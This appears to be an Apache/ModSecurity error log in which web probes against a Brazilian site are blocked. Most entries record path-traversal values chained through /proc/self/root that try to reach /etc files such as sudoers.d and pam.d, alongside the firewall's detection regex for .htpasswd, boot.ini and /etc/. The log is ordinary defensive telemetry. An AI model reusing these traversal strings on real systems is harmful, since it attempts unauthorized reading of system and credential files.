[Wed Mar 18 11:09:40.461625 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:56408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyJOyqAr6etmhZHNrFYQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:41.288380 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:46082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyJeyqAr6etmhZHNrFYgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:41.794260 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:56418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyJcdf6f5d65gmYZTZ_gAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:46.331006 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:56430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyKsdf6f5d65gmYZTaCwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:47.696940 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:56438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyK9Y0UrI5A3LftIywngAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:49.007660 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:56442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyLQkwaGbbGflqUZAUagAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:50.338051 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:60074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyLimAPhZkrhU8w4lxvQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:52.679828 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:60084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyMOoXxyEfFpUF8f9xzQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:55.203534 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:60096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyM_u8EFLIOrSqIpsIagAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:55.515767 2026] [mime_magic:error] [pid 15826:tid 140411708356352] (70014)End of file found: [client 57.141.18.119:51056] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:09:59.008740 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:50910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyN9a6ubjKNq_cu4ae6wAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:10:06.658858 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:60098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyPSmAPhZkrhU8w4lxzwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:10:08.199221 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:53280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyQOoXxyEfFpUF8f9x0AAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:10:11.603430 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:47864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyQwkwaGbbGflqUZAUcgAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:10:12.982299 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:47874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyRMdf6f5d65gmYZTaFgAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:10:22.052104 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:49492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyTtY0UrI5A3LftIyw4wAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:10:23.475391 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:47884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyTymAPhZkrhU8w4lx3QAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:10:24.794723 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:53840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyUMdf6f5d65gmYZTaIQAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:10:29.390496 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:53850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyVfu8EFLIOrSqIpsIhgAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:10:31.579831 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:33990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyVgkwaGbbGflqUZAUgQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:00.167201 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:33994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqydNY0UrI5A3LftIyxLAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:06.143547 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:35488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyevu8EFLIOrSqIpsIlQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:10.455579 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:35492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyfuoXxyEfFpUF8f9x7QAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
